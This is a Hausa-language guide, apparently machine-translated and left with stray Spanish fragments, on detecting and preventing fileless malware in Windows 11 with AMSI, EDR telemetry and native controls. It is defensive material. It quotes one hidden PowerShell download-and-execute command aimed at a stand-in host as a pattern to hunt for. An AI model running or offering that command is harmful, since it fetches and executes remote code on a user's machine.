Yadda za a gano malware mara haɗari a cikin Windows 11

¿Yadda za a gano malware maras fayil mai haɗari? Ayyukan hare-hare marasa fayil ya girma sosai, kuma ya ƙara yin muni, Windows 11 ba shi da kariyaWannan hanya ta ƙetare faifai kuma ta dogara da ƙwaƙwalwar ajiya da kayan aikin tsarin halal; shi ya sa shirye-shiryen riga-kafi na sa hannu ke gwagwarmaya. Idan kana neman tabbataccen hanya don gano ta, amsar tana cikin haɗawa telemetry, nazarin hali, da sarrafa Windows.

A cikin yanayin halittu na yanzu, kamfen ɗin da ke cin zarafin PowerShell, WMI, ko Mshta yana tare tare da ingantattun dabaru kamar allurar ƙwaƙwalwar ajiya, dagewa "ba tare da taɓa" faifai ba, har ma firmware zagiMakullin shine fahimtar taswirar barazanar, matakan kai hari, da menene alamun da suke barin koda lokacin da komai ya faru a cikin RAM.

Menene malware marar fayil kuma me yasa yake damuwa a cikin Windows 11?

Lokacin da muke magana game da barazanar "marasa fayil", muna magana ne ga lambar ɓarna wanda Ba kwa buƙatar saka sabbin masu aiwatarwa. a cikin tsarin fayil don aiki. Yawancin lokaci ana allura shi cikin tafiyar matakai kuma ana aiwatar da shi a cikin RAM, dogara ga masu fassara da binaries da Microsoft ta sa hannu (misali, PowerShell, WMI, rundll32, mshtaWannan yana rage sawun sawun ku kuma yana ba ku damar ketare injuna waɗanda kawai ke neman fayiloli masu tuhuma.

Hatta takaddun ofis ko PDFs waɗanda ke amfani da rashin lahani don ƙaddamar da umarni ana ɗaukarsu wani ɓangare na al'amarin, saboda kunna kisa a ƙwaƙwalwar ajiya ba tare da barin binaries masu amfani don bincike ba. Zagi na macro da DDE A cikin Office, tunda lambar tana gudana a cikin halaltattun matakai kamar WinWord.

Maharan sun haɗu da aikin injiniya na zamantakewa (phishing, spam links) tare da tarkon fasaha: danna mai amfani yana ƙaddamar da sarkar da rubutun zazzagewa da aiwatar da nauyin ƙarshe a ƙwaƙwalwar ajiya, kaucewa barin wata alama a kan faifai. Makasudin sun kasance daga satar bayanai zuwa aiwatar da ransomware, zuwa motsi na gefe shiru.

Nau'ukan sawun sawun tsarin: daga 'tsabta' zuwa hybrids

Don guje wa ra'ayoyi masu ruɗani, yana da taimako a raba barazanar ta matakin hulɗarsu da tsarin fayil. Wannan rarrabuwa yana fayyace abin da ya ci gaba, a ina code yake zaune, kuma waɗanne alamun ya bar?.

Nau'in I: babu aikin fayil

Gaba ɗaya malware maras fayil baya rubuta komai a faifai. Misali na yau da kullun shine yin amfani da a raunin hanyar sadarwa (kamar vector na EternalBlue baya a cikin rana) don aiwatar da gidan baya da ke zaune a cikin ƙwaƙwalwar kernel (al'amura kamar DoublePulsar). Anan, komai yana faruwa a cikin RAM kuma babu kayan tarihi a cikin tsarin fayil.

Wani zaɓi shine don gurɓatar da firmware na abubuwa: BIOS/UEFI, adaftar cibiyar sadarwa, kebul na gefe (nau'in fasaha na BadUSB) ko ma tsarin tsarin CPU. Suna dagewa ta hanyar sake farawa da sake kunnawa, tare da ƙarin wahalar hakan Kaɗan samfuran suna duba firmwareWaɗannan hare-hare ne masu rikitarwa, ba su da yawa, amma masu haɗari saboda saɓo da dorewa.

Nau'in II: Ayyukan adanawa kai tsaye

Anan, malware ba ya “bari” nasa wanda za a iya aiwatar da shi, amma yana amfani da kwantena masu sarrafa tsarin waɗanda aka adana su azaman fayiloli. Misali, bayan gida cewa shuka comandos de PowerShell a cikin ma'ajiyar WMI kuma ta haifar da aiwatar da shi tare da tacewa taron. Yana yiwuwa a shigar da shi daga layin umarni ba tare da sauke binaries ba, amma ma'ajin WMI yana zaune a kan faifai a matsayin ingantaccen bayanai, yana sa ya zama mai wahala a tsaftacewa ba tare da rinjayar tsarin ba.

Daga mahangar aiki ana ɗaukar su marasa fayil, saboda wannan akwati (WMI, Registry, da sauransu) Ba na zamani ba ne wanda za'a iya aiwatarwa Kuma tsaftace shi ba karamin abu ba ne. Sakamakon: dagewar sata tare da ɗan "gargajiya" alama.

Nau'in III: Yana buƙatar fayiloli don aiki

Wasu lokuta suna kiyaye a nacewa 'marasa fayil' A matakin ma'ana, suna buƙatar faɗakar da tushen fayil. Misali na yau da kullun shine Kovter: yana yin rijistar kalmar harsashi don tsawaita bazuwar; lokacin da aka buɗe fayil ɗin da ke da wannan tsawo, an ƙaddamar da ƙaramin rubutun ta amfani da mshta.exe, wanda ke sake gina kirtani mai ɓarna daga Registry.

Dabarar ita ce waɗannan fayilolin "koto" tare da kari na bazuwar ba su ƙunshi nauyin da za a iya tantancewa ba, kuma yawancin lambar suna zaune a cikin Rikodi (wani akwati). Shi ya sa aka kasafta su a matsayin marasa fayil a cikin tasiri, duk da cewa tsantsar magana sun dogara da ɗaya ko fiye da kayan tarihin diski a matsayin faɗakarwa.

Vectors da 'runduna' na kamuwa da cuta: inda ya shiga da kuma inda ya boye

Don inganta ganowa, yana da mahimmanci a tsara taswirar wurin shiga da kuma mai dauke da cutar. Wannan hangen nesa yana taimakawa wajen tsarawa takamaiman sarrafawa Ba da fifikon na'urorin sadarwa masu dacewa.

Exploits

• tushen fayil (Nau'in III): Takaddun bayanai, masu aiwatarwa, fayilolin Flash/Java na gado, ko fayilolin LNK na iya amfani da mai bincike ko injin da ke sarrafa su don loda lambar harsashi zuwa ƙwaƙwalwar ajiya. Na farko vector fayil ne, amma abin biya yana tafiya zuwa RAM.
• tushen hanyar sadarwa (Nau'in I): Kunshin da ke cin gajiyar rauni (misali, a cikin SMB) yana samun aiwatarwa a cikin ƙasa mai amfani ko kwaya. WannaCry ya yada wannan hanyar. Ƙwaƙwalwar ƙwaƙwalwa kai tsaye ba tare da sabon fayil ba.

Kayan aiki

• Na'urori (Nau'in I): Ana iya canza diski ko firmware katin cibiyar sadarwa da gabatar da lamba. Yana da wahala a bincika kuma yana dawwama a wajen OS.
• CPU da tsarin gudanarwa (Nau'in I): Fasaha irin su ME/AMT na Intel sun nuna hanyoyin zuwa Sadarwar sadarwa da kisa a wajen OSYana kai hari a matakin ƙasa kaɗan, tare da babban yuwuwar saɓo.
• kebul na USB (Nau'in I): BadUSB yana ba ku damar sake tsara kebul na USB don kwaikwayi keyboard ko NIC da ƙaddamar da umarni ko tura zirga-zirga.
• BIOS/UEFI (Nau'in I): reprogramming malicious firmware (kamar Mebromi) wanda ke gudana kafin takalman Windows.
• Hypervisor (Nau'i na I): Aiwatar da ƙaramin hypervisor a ƙarƙashin OS don ɓoye gabansa. Rare, amma an riga an lura a cikin hanyar hypervisor rootkits.

Kisa da allura

• tushen fayil (Nau'in III): EXE/DLL/LNK ko ayyukan da aka tsara waɗanda ke ƙaddamar da alluran cikin ingantattun matakai.
• Macros (Nau'in III): VBA a cikin Office na iya yankewa da aiwatar da abubuwan da aka biya, gami da cikakken ransomware, tare da izinin mai amfani ta hanyar yaudara.
• Rubuce-rubuce (Nau'in II): PowerShell, VBScript ko JScript daga fayil, layin umarni, ayyuka, Rijista ko WMIMaharan na iya rubuta rubutun a cikin wani zama mai nisa ba tare da taɓa faifai ba.
• Rikodin taya (MBR/Boot) (Nau'in II): Iyalai kamar Petya suna sake rubuta sashin taya don ɗaukar iko a farawa. Yana waje da tsarin fayil, amma yana iya samun dama ga OS da mafita na zamani waɗanda zasu iya mayar da shi.

Yadda hare-haren marasa fayil ke aiki: matakai da sigina

Ko da yake ba sa barin fayilolin da za a iya aiwatarwa, kamfen ɗin suna bin tsarin dabaru. Fahimtar su yana ba da damar saka idanu. abubuwan da suka faru da dangantaka tsakanin matakai wanda ya bar alama.

• Samun shiga na farkoAna kai hari ta hanyar amfani da hanyoyin haɗin gwiwa ko haɗe-haɗe, gidajen yanar gizo da aka lalata, ko bayanan sata. Yawancin sarƙoƙi suna farawa da takaddun Office wanda ke haifar da umarni PowerShell.
• Dagewa: bayan gida ta hanyar WMI (masu tacewa da biyan kuɗi), Maɓallan aiwatar da rajista ko shirye-shiryen ayyuka waɗanda ke sake buɗe rubutun ba tare da sabon fayil ɗin qeta ba.
• ExfiltrationDa zarar an tattara bayanan, ana aika shi daga hanyar sadarwa ta hanyar amfani da amintattun matakai (browser, PowerShell, bitsadmin) don haɗa zirga-zirga.

Wannan tsari yana da ban sha'awa musamman saboda yanayin alamun hari Suna ɓoye cikin al'ada: gardama-layin umarni, sarkar tsari, haɗin kai mara kyau, ko samun damar yin amfani da APIs na allura.

Dabarun gama gari: daga ƙwaƙwalwa zuwa rikodi

Masu wasan kwaikwayo sun dogara da kewayon hanyoyin da inganta stealth. Yana da taimako don sanin mafi yawan gama gari don kunna ingantaccen ganowa.

• Mazauna cikin ƙwaƙwalwar ajiya: Load da kaya a cikin sararin amintaccen tsari wanda ke jiran kunnawa. rootkits da ƙugiya A cikin kwaya, suna haɓaka matakin ɓoyewa.
• Dagewa a cikin RegistryAjiye ɓoyayyen ɓoyayyen ɓoyayyiyar maɓalli kuma saka su ruwa daga halaltaccen mai ƙaddamar da su (mshta, rundll32, wscript). Mai sakawa ephemeral na iya lalata kansa don rage sawun sa.
• Amintaccen phishingYin amfani da sunayen masu amfani da kalmomin shiga da aka sace, maharin yana aiwatar da harsashi da tsire-tsire masu nisa shiga shiru a cikin Registry ko WMI.
• 'Rashin Fayil' RansomwareRufewa da sadarwar C2 an tsara su ne daga RAM, rage damar ganowa har sai an ga lalacewa.
• Kayan aiki: sarƙoƙi mai sarrafa kansa waɗanda ke gano lahani da tura kayan aikin ƙwaƙwalwar ajiya kawai bayan dannawa mai amfani.
• Takardu masu lamba: macros da hanyoyin kamar DDE waɗanda ke haifar da umarni ba tare da adana abubuwan aiwatarwa zuwa faifai ba.

Nazarin masana'antu sun riga sun nuna manyan kololuwa: a cikin wani lokaci na 2018, a karuwa fiye da 90% a cikin tushen rubutun da hare-haren sarkar PowerShell, alamar cewa an fi son vector don tasiri.

Kalubalen ga kamfanoni da masu samar da kayayyaki: me yasa toshewa bai isa ba

Zai zama jaraba don kashe PowerShell ko dakatar da macros har abada, amma Za ku karya aikinPowerShell ginshiƙi ne na gudanarwa na zamani kuma Ofishin yana da mahimmanci a cikin kasuwanci; toshe makauniya sau da yawa baya yiwuwa.

Bugu da ƙari, akwai hanyoyin da za a ketare mahimman sarrafawa: gudanar da PowerShell ta hanyar DLLs da rundll32, rubutun marufi zuwa EXEs, Kawo kwafin PowerShell naka ko ma ɓoye rubutun a cikin hotuna kuma cire su cikin ƙwaƙwalwar ajiya. Saboda haka, tsaro ba zai iya dogara ne kawai akan ƙin kasancewar kayan aiki ba.

Wani kuskuren gama gari shine ƙaddamar da duk shawarar ga gajimare: idan wakili ya jira amsa daga uwar garken, Kuna rasa rigakafin lokaci-lokaciAna iya loda bayanan telemetry don wadatar da bayanan, amma Dole ne ragewa ya faru a ƙarshen ƙarshen.

Yadda ake gano malware marasa fayil a cikin Windows 11: telemetry da hali

Dabarar nasara ita ce saka idanu matakai da ƙwaƙwalwar ajiyaBa fayiloli ba. Halayen ƙeta sun fi kwanciyar hankali fiye da siffofin da fayil ke ɗauka, yana mai da su manufa don injunan rigakafi.

• AMSI (Antimalware Scan Interface)Yana satar rubutun PowerShell, VBScript, ko JScript koda lokacin da aka gina su a cikin ƙwaƙwalwar ajiya. Yana da kyau don ɗaukar igiyoyi masu ɓoye kafin kisa.
• Sa ido kan tsari: farawa/gama, PID, iyaye da yara, hanyoyi, layin umarni da hashes, da bishiyar kisa don fahimtar cikakken labarin.
• Binciken ƙwaƙwalwar ajiya: gano allurai, nauyin nauyi ko PE ba tare da taɓa faifai ba, da kuma nazarin yankuna masu aiwatar da sabon abu.
• Kariyar sashen farawa: sarrafawa da maido da MBR/EFI idan an yi tambari.

A cikin yanayin yanayin Microsoft, Mai Karewa don Ƙarshen Point ya haɗa AMSI, kula da haliAna amfani da sikanin ƙwaƙwalwar ajiya da koyan injunan tushen gajimare don ƙididdige ganowa akan sababbin ko ɓoyayyun bambance-bambancen. Sauran dillalai suna amfani da hanyoyi iri ɗaya tare da injunan mazaunin kernel.

Misali na gaskiya na alaƙa: daga takarda zuwa PowerShell

Ka yi tunanin sarkar inda Outlook ke zazzage abin da aka makala, Kalma ta buɗe daftarin aiki, an kunna abun ciki mai aiki, kuma an ƙaddamar da PowerShell tare da sigogi masu tuhuma. Na'urar da ta dace zata nuna layin umarni (misali, ExecutionPolicy Bypass, ɓoyayyun taga), haɗawa zuwa yanki mara amana da ƙirƙirar tsarin yaro wanda ya shigar da kansa a cikin AppData.

Wakili mai mahallin gida yana iya tsaya ya juyo ayyukan mugunta ba tare da sa hannun hannu ba, ban da sanar da SIEM ko ta imel/SMS. Wasu samfura suna ƙara tushen tushen dalili (nau'in nau'in LabarinLine), wanda ke nuni ba ga tsarin da ake iya gani ba (Outlook/Kalma), amma ga cikakken zaren mugunta da asalinsa don tsabtace tsarin gabaɗaya.

Tsarin umarni na yau da kullun don kula da shi zai iya yin kama da haka: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Logic ba shine ainihin kirtani ba, amma saitin sigina: Keɓancewar tsari, taga ɓoye, saukarwa mai tsabta, da aiwatar da ƙwaƙwalwar ajiya.

AMSI, bututu da rawar kowane mai wasan kwaikwayo: daga ƙarshen ƙarshen zuwa SOC

Bayan kama rubutun, ingantaccen tsarin gine-gine yana tsara matakan da ke sauƙaƙe bincike da amsawa. Ƙarin shaida kafin aiwatar da kaya, mafi kyau., mejor.

• Tsabar rubutunAMSI tana isar da abun ciki (ko da an ƙirƙira shi a kan tashi) don bincike mai ƙarfi da ƙarfi a cikin bututun malware.
• Tsarin abubuwan da suka faruAna tattara PIDs, binaries, hashes, hanyoyi, da sauran bayanai. muhawara, kafa bishiyoyi masu tsari wanda ya haifar da nauyin ƙarshe.
• Ganewa da rahotoAna nuna abubuwan ganowa akan na'urar bidiyo kuma ana tura su zuwa dandamali na cibiyar sadarwa (NDR) don ganin yakin neman zabe.
• Garanti mai amfaniKo da an shigar da rubutun cikin ƙwaƙwalwar ajiya, tsarin AMSI ta katse shi a cikin sigogin Windows masu jituwa.
• Iyawar gudanarwa: Tsarin tsari don ba da damar duba rubutun, toshewar halayya da ƙirƙirar rahotanni daga na'ura mai kwakwalwa.
• Aikin SOC: cire kayan tarihi (VM UUID, sigar OS, nau'in rubutun, tsarin farawa da iyayen sa, hashes da layin umarni) don sake ƙirƙirar tarihi da daga dokokin futuras.

Lokacin da dandamali ya ba da damar fitarwa da ƙwaƙwalwar ajiya Haɗe da kisa, masu bincike za su iya samar da sabbin abubuwan ganowa da wadatar da tsaro daga bambance-bambancen iri ɗaya.

Matakan aiki a cikin Windows 11: rigakafi da farauta

Baya ga samun EDR tare da duba ƙwaƙwalwar ajiya da AMSI, Windows 11 yana ba ku damar rufe wuraren kai hari da haɓaka gani tare da na asali controls.

• Rijista da ƙuntatawa a cikin PowerShellYana ba da damar Shigar Rubutun Rubutun da Login Module, yana amfani da ƙayyadaddun hanyoyi inda zai yiwu, kuma yana sarrafa amfani da Kewaya/Boye.
• Dokokin Rage Haɓaka Sama (ASR).: toshe ƙaddamar da rubutun ta hanyoyin Office da WMI cin zarafi/PSExec lokacin da ba a buƙata.
• Manufofin macro na ofis: yana kashe ta tsohuwa, sa hannu na macro na ciki da tsauraran jerin amintattu; yana lura da abubuwan da aka bari na DDE.
• WMI Audit da Registry: yana lura da biyan kuɗi na taron da maɓallan aiwatarwa ta atomatik (Run, RunOnce, Winlogon), da kuma ƙirƙirar ɗawainiya shirya.
• Kariyar farawa: yana kunna Secure Boot, yana bincika amincin MBR/EFI kuma yana tabbatar da cewa babu gyare-gyare a farawa.
• Patching da hardening: yana rufe rashin lahani a cikin masu bincike, abubuwan ofis, da sabis na cibiyar sadarwa.
• sani: horar da masu amfani da ƙungiyoyin fasaha a cikin phishing da sigina na kisa a boye.

Don farauta, mayar da hankali kan tambayoyi game da: ƙirƙirar matakai ta Office zuwa PowerShell/MSHTA, muhawara tare da downloadstring/zazzage fayilRubutun tare da bayyanannun ɓoyayyiya, alluran kyama, da hanyoyin sadarwa masu fita zuwa TLDs masu tuhuma. Yi la'akari da waɗannan sigina tare da suna da mita don rage hayaniya.

Menene kowane injin zai iya ganowa a yau?

Hanyoyin kasuwancin Microsoft sun haɗu da AMSI, nazarin ɗabi'a, bincika ƙwaƙwalwar ajiya da kariyar ɓangaren taya, da samfuran ML na tushen girgije don ƙima daga barazanar da ke tasowa. Sauran dillalai suna aiwatar da sa ido kan matakin kernel don bambance ƙeta daga software mara kyau tare da jujjuyawar canje-canje ta atomatik.

Hanyar da ta dogara akan labarun kisa Yana ba ku damar gano tushen tushen (misali, abin da aka makala na Outlook wanda ke haifar da sarkar) da rage dukkan bishiyar: rubutun, maɓalli, ayyuka, da binaries na tsaka-tsaki, guje wa makale akan alamar da ake gani.

Kuskure na yau da kullun da yadda ake guje musu

Toshe PowerShell ba tare da madadin tsarin gudanarwa ba ba kawai mai amfani bane, amma akwai kuma hanyoyin kiransa a kaikaiceHakanan ya shafi macros: ko dai kuna sarrafa su da manufofi da sa hannu, ko kuma kasuwancin zai wahala. Yana da kyau a mai da hankali kan telemetry da ƙa'idodin ɗabi'a.

Wani kuskuren gama gari shine yarda cewa aikace-aikacen ba da izini yana warware komai: fasaha mara fayil ta dogara da wannan daidai. amintattun appsYa kamata masu sarrafawa su lura da abin da suke yi da yadda suke da alaƙa, ba kawai ko an yarda da su ba.

Tare da duk abubuwan da ke sama, malware marasa fayil ya daina zama "fatalwa" lokacin da kuke saka idanu akan abin da ke da mahimmanci: hali, ƙwaƙwalwar ajiya da asali na kowane kisa. Haɗa AMSI, wadataccen tsarin telemetry, na asali Windows 11 sarrafawa, da kuma layin EDR tare da nazarin ɗabi'a yana ba ku fa'ida. Ƙara zuwa ma'auni na gaskiya na macro da PowerShell, WMI/Register auditing, da kuma farauta waɗanda ke ba da fifikon layin umarni da sarrafa bishiyoyi, kuma kuna da tsaro wanda ke yanke waɗannan sarƙoƙi kafin su yi sauti.